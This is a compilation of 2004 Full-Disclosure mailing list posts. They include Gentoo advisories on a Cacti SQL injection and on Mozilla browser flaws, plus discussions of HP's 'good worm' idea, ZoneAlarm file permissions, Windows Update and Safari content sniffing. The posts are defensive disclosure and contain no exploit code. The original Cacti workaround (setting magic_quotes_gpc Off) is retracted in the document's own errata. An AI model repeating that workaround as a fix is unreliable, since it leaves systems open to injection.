-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200408-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Cacti: SQL injection vulnerability Date: August 23, 2004 Bugs: #60630 ID: 200408-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata == The workaround proposed in the original version of this Security Advisory did not correctly address the issue. The corrected sections appear below. Workaround == There is no known workaround at this time. All users are encouraged to upgrade to the latest available version of Cacti. Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200408-21.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBKfGEzKC5hMHO6rkRAkWgAJ4uD51Ca3y6+5sc0tT7q/tdFygoVQCfbdEU EA+yZ0SZ3zNvcQNYECcPnus= =GyPM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200408-21 ] Cacti: SQL injection vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200408-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Cacti: SQL injection vulnerability Date: August 23, 2004 Bugs: #60630 ID: 200408-21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis With special configurations of Cacti it is possible to change passwords via a SQL injection attack. Background == Cacti is a complete web-based front end to rrdtool. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/cacti <= 0.8.5a>= 0.8.5a-r1 Description === Cacti is vulnerable to a SQL injection attack where an attacker may inject SQL into the Username field. Impact == An attacker could use these vulnerabilities to compromise the Cacti service and potentially execute programs with the permissions of the user running Cacti. Workaround == To prevent SQL code injection, php_flag magic_quotes_gpc should be set to Off. By default, Gentoo Linux installs PHP with this option set to Off. Resolution == All users should upgrade to the latest available version of Cacti, as follows: # emerge sync # emerge -pv ">=net-analyzer/cacti-0.8.5a-r1" # emerge ">=net-analyzer/cacti-0.8.5a-r1" References == [ 1 ] Full Disclosure Announcement http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0717.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200408-21.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 pgpo6R3hWRKxg.pgp Description: PGP signature
Re: [Full-Disclosure] The 'good worm' from HP
The Central Scroutinizer wrote: Would it not be better to have a standard secure backdoor provided by a security package that could downloaded or installed by disk and works hand in hand with port scanning software, if this is really necassary. I am supprised Microsoft have not released such a peice of software; maybe a third party have. There is a known backdoor on every modern system: the administrator/root/whatever account. Systeminternals(and others) have a tool which allows remote execution on windows nt/2k/xp (*)... could be a solution (we used it to install ie 6 and thunderbird x.y.z), ssh or even rsh exists for most unix variants. We once used symantec's av remote management console (named: ???, the current version is not smart enough for this) to install things like netscape browser and making sure some registry & files were as we wanted...it's again a windows nt/2k/xp 'feature', for unixes, ssh or rsh (or is it rexec ?) are still available. *: one such a tool adds a scheduled task and make sure the task scheduler is running. Even if it is a controlled worm that moves around in the internal network patching computers, it sounds like a very stupid idea. I hope it is a bad choice of words. He is a VP, should I say more? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)
In reply to my own previous email, I assumed ZA would fail, as others have on this list, with an EVERYONE:DENY security policy, however this isn't the case. ZA 5.1 PRO Trial version will change this to EVERYONE:FULL for the duration of the program after which it will then change these settings back to the original EVERYONE:DENY. This throws out the DoS theory, but the permissions are still extremely permissive, if the "truevector driver" was to have issues with it's integrity checks then the files in this folder would be easily compromised. Since ZA can obviously access the file when they are set to EVERYONE:DENY it makes sense to leave them like that, which would be an added layer of security, you shouldn't override a security mechanism with your own if they can work together, especially if the existing mechanism doesn't conflict with yours, which in this case it obviously doesn't. Although as configuration files are in that folder, there is also an information disclosure issue to be addressed. I'm sure your clients would feel more secure in their choice of firewall product if it followed good security practise and maintained a level of least privilege, considering security as an in depth process. Consider /etc/passwd on unix, pre-shadow, this file was viewable by all and contained password hashes, but if you followed good security practise, changed the passwords regularly and made them difficult to break then this wasn't that much of an issue, however there was the chance that someone could crack a password before it's end of life, therefore it was felt prudent to hide these from the user as the user didn't _need_ to know (least privilege). This issue is very akin to that example. As a security vendor these are not new concepts to ZoneLabs, therefore they should be addressed Again apologies for my initial incorrect assumption, but the issue still stands, its unnecessarily open and requires a rethink. On Mon, 2004-08-23 at 12:28, Barrie Dempster wrote: > As for the ZA bug in particular, changing these permissions breaks ZA, > the admin could fix it and bring it back, but it would still be a DoS > and an effective ZA countermeasure for a virus. ZA, please fix this, the > people on this list complaining about it are correct, it does pose a > potential problem. > -- Barrie Dempster (zeedo) - Fortiter et Strenue http://www.bsrf.org.uk [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ] signature.asc Description: This is a digitally signed message part
[Full-Disclosure] [ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird: New releases fix vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200408-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla, Firefox, Thunderbird: New releases fix vulnerabilities Date: August 23, 2004 Bugs: #57380, #59419 ID: 200408-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis New releases of Mozilla, Mozilla Thunderbird, and Mozilla Firefox fix several vulnerabilities, including remote DoS and buffer overflows. Background == Mozilla is a popular web browser that includes a mail and newsreader. Mozilla Firefox is the next-generation browser from the Mozilla project that incorporates advanced features that are yet to be incorporated into Mozilla. Mozilla Thunderbird is the next-generation mail client from the Mozilla project. Affected packages = --- Package / Vulnerable / Unaffected --- 1 mozilla < 1.7.2>= 1.7.2 2 mozilla-firefox < 0.9.3>= 0.9.3 3 mozilla-thunderbird < 0.7.3>= 0.7.3 4 mozilla-bin < 1.7.2>= 1.7.2 5 mozilla-firefox-bin < 0.9.3>= 0.9.3 6 mozilla-thunderbird-bin < 0.7.3>= 0.7.3 --- 6 affected packages on all of their supported architectures. --- Description === Several vulnerabilities were found in Mozilla and Mozilla Firefox: * Both browsers contain a bug in their caching which may allow the SSL icon to remain visible, even when the site in question is an insecure site. * An attacker may force the browser to execute arbitrary code from a malicious website by utilizing Mozilla's predictable cache file locations, and its ability to execute local files within the local zone. Mozilla, Mozilla Firefox and Mozilla Thunderbird contain the following vulnerabilities: * All Mozilla tools use libpng for graphics. This library contains a buffer overflow which may lead to arbitrary code execution. * If a user imports a forged Certificate Authority (CA) certificate, it may overwrite and corrupt the valid CA already installed on the machine. Impact == Users of Mozilla and Mozilla Firefox are susceptible to SSL certificate spoofing, a Denial of Service against legitimate SSL sites, crashes, and arbitrary code execution. Users of Mozilla Thunderbird are susceptible to crashes and arbitrary code execution via malicious e-mails. Workaround == There is no known workaround for most of these vulnerabilities. All users are advised to upgrade to the latest available version. Resolution == All users should upgrade to the latest stable version: # emerge sync # emerge -pv your-version # emerge your-version References == [ 1 ] CAN-2004-0763 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763 [ 2 ] CAN-2004-0758 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758 [ 3 ] CAN-2004-0597 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597 [ 4 ] CAN-2004-0598 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598 [ 5 ] CAN-2004-0599 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200408-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 pgpAYGA9BNVx0.pgp Description: PGP signature
Re: [Full-Disclosure] Windows Update
In some mail from Security List, sie said: > > Went to windows update last night w/ XP Pro. > Redirected to the v5 version. I was asked to install > the new Windows Update software...downloaded the WU > software...copied the files...then saw > registering...kinda thinking that it was checking for > a valid registration or license. No updates needed > according to WU. XP SP2 is not available via WU for > XP Pro yet. > > Now, I checked the Automatic Update service to see if > it was turned back start automatic as I always have it > disabled. Yup, it was set to automatic and it was > started. I stop and disable automatic update service, > and try WU. Get error stating that the automatic > update service must be enable to use WU now. Has > anybody else head of this? Once again, we must have > services that we do not want enable. I can not > believe that they are forcing user to turn on the > service to use WU. I discovered this when testing out v5beta and had to do a checkpoint recovery to restore version 4. If you don't install the latest Windows Update software (if, for example, you have all Active X stuff set for prompting and you say "no") then you don't even get to 1st base and Windows Updates (via a convienient mechanism) are not available. IMHO, this sucks big time. What I see Microsoft as doing is pretty much forcing everyone to turn on Automatic Windows Update. Why leave it as a control panel option, I've no clue. Same with BIT (Background Intelligent Transfers.) For the millions of users out there that are likely subject to viruses, etc, I'm sure it will help make things better, but for people who would fit into the "power user" class, it's a real pain in the arse. I really object to this philosophy because it does not let a person plan the downloading and installation of updates - some of which will require a reboot. What do large corporate installations of Windows do here? Do they run their own caches of the Windows updates? Push out updates from servers rather than have clients pull? Is it all done with SUS? Is SUS usable on a single node, in place of WU? The help for the "Windows Update" web site suggests that it is possible to get updates without Automatic Updates. Is the help out of date or is there a way to still do it without AU on ? If you were a conspiracy theorist, you'd say this was Microsoft's way of being able to do more automatic updates before announcing a security vulnerability and mitigate the impact of 0-day exploits (developed through reverse engineering of changes.) Darren ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)
On Sun, 2004-08-22 at 20:11, bipin gautam wrote: > Not really, I've discoverd a NTFS feature (BUG?). > well... If you have system/administrative privilages > in a disk you can read/modify a file even though > it has "EVERYONE: DENY" permission set. This is neither a feature nor a bug of NTFS because, as you have stated you are not using NTFS at all but reading from the disk directly, this always has been possible on any non-encrypted filesystem. the super user has direct hardware access on most OS's (Windows and Linux at least) so they can directly manipulate the hardware this is why things like custom TCP/IP stacks work, they override the OS's mechanisms, because the OS is designed to let you have that control. IMO if the super user could NOT bring back a file with those severely restricted permissions, then _that_ would be the bug as it would be a trivially exploited DoS attack. As for the ZA bug in particular, changing these permissions breaks ZA, the admin could fix it and bring it back, but it would still be a DoS and an effective ZA countermeasure for a virus. ZA, please fix this, the people on this list complaining about it are correct, it does pose a potential problem. -- Barrie Dempster (zeedo) - Fortiter et Strenue http://www.bsrf.org.uk [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ] signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)
Chris Smith wrote: On Mon, 23 Aug 2004 07:11, bipin gautam wrote: Not really, I've discoverd a NTFS feature (BUG?). well... If you have system/administrative privilages in a disk you can read/modify a file even though it has "EVERYONE: DENY" permission set. OMFG!! REISERFS HAS THE SAME EXPLOIT CHECK OUT MY POC! [EMAIL PROTECTED] h4x0r $ echo "bipin sucks" >> hax [EMAIL PROTECTED] h4x0r $ chmod -rwx hax [EMAIL PROTECTED] h4x0r $ ls -alo hax -- 1 chris 12 Aug 23 21:58 hax [EMAIL PROTECTED] h4x0r $ cat hax cat: hax: Permission denied [EMAIL PROTECTED] h4x0r $ sudo cat hax bipin sucks [EMAIL PROTECTED] h4x0r $ Chris - it's worse than we thought. Looks like EXT3 suffers the same problem: [EMAIL PROTECTED]:~> echo "4m cl3v4r" >> wtf [EMAIL PROTECTED]:~> chmod -rwx wtf [EMAIL PROTECTED]:~> ls -l wtf -- 1 jamesgr users 10 2004-08-23 12:01 wtf [EMAIL PROTECTED]:~> su Password: gradius:/home/jamesgr # cat wtf 4m cl3v4r gradius:/home/jamesgr # Obviously they must both be derived from the same code. An IBM employee has clearly contributed this code simultaneously to BSD (which Microsoft has innocently used) and Linux, copied from UNIX(R) source which SCO owns! THE SKY IS FALLING! Please don't hurt me SCO! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)
On Mon, 23 Aug 2004 07:11, bipin gautam wrote: > Not really, I've discoverd a NTFS feature (BUG?). > well... If you have system/administrative privilages > in a disk you can read/modify a file even though > it has "EVERYONE: DENY" permission set. OMFG!! REISERFS HAS THE SAME EXPLOIT CHECK OUT MY POC! [EMAIL PROTECTED] h4x0r $ echo "bipin sucks" >> hax [EMAIL PROTECTED] h4x0r $ chmod -rwx hax [EMAIL PROTECTED] h4x0r $ ls -alo hax -- 1 chris 12 Aug 23 21:58 hax [EMAIL PROTECTED] h4x0r $ cat hax cat: hax: Permission denied [EMAIL PROTECTED] h4x0r $ sudo cat hax bipin sucks [EMAIL PROTECTED] h4x0r $ Superuser means _SUPERUSER_ (or administrator). Not a bug, not a feature. It just is. Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Safari/WebCore Content Sniffing
Le sam 21/08/2004 à 17:44, fukami a écrit : > All other browser I tested so far have the right behavior > and treat plain text files as plain text files. Old versions of Opera were doing "MIME sniffing" too. Apparently, the problem is resolved in recents versions (tested on Opera 7.54). I made months ago a small CGI used for testing browsers for HTML and JavaScript interpretation with a text/plain content type : http://nicob.net/cgi-bin/content-type.cgi -- Nicob <[EMAIL PROTECTED]> ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
